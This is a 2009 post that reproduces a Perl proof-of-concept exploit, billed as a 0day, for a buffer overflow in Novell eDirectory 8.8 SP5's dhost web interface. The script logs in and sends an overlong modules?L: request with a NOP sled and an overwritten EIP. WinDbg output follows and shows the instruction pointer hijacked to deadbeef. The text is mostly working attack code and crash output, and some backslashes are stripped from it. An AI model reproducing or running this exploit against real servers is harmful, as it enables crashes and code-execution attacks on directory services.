Posted on 26 October 2009

#PoC for Vulnerability: #!usrinperl #Novell eDirectory 8.8 SP5 BoF Vuln - 0day #Vulnerability found in Hellcode Labs. #karak0rsan || murderkey #info[at]hellcode.net || www.hellcode.net #to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)" #http://www.youtube.com/watch?v=6bloyjV-Hhs use WWW::Mechanize; use LWP::Debug qw(+); use HTTP::Cookies; $target=$ARGV[0]; if(!$ARGV[0]){ print "Novell eDirectory 8.8 SP5 Exploit "; print "Hellcode Research || Hellcode.net "; print "Usage:perl $0 [target] "; exit(); } $login_url = "$target/_LOGIN_SERVER_"; $url = "$target/dhost/"; $vuln = "modules?L:"; $nop = "x90" x 1668; $eip = "xefxbexadxde"; $data = "B" x 235; $hellcode = $vuln.$nop.$eip.$data; ########Write your usr and pwd######## $username = "Admin.context"; $password = "1234"; my $mechanize = WWW::Mechanize->new(); $mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1)); $mechanize->timeout($url_timeout); $res = $mechanize->request(HTTP::Request->new('GET', "$login_url")); $mechanize->submit_form( form_name => "authenticator", fields => { usr => $username, pwd => $password}, button => 'Login'); $response2 = $mechanize->get("$url$hellcode"); ##Debugger Results of PoC: Windbg- File>Attach to a process>dhost.exe eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000 eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Windowssystem32 tdll.dll - ntdll!DbgBreakPoint: 77867dfe cc int 3 0:088> g Debuggee is running... ##C:UsersDELLVideoskarak0rsanPerlin>perl novelbof.pl ##Debugger Results after running poc: (1cc.1d44): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878 eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WindowsWinSxSx86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36MSVCR80.dll - MSVCR80!vfwprintf_p+0x5b: 75c11684 8802 mov byte ptr [edx],al ds:0023:038b0000=?? -- EAX = 00000042 (writed a part of eax) ##0:010> g (8e4.bb4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000 eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 deadbeef ?? ??? #EIP=deadbeef - We controled eip ;)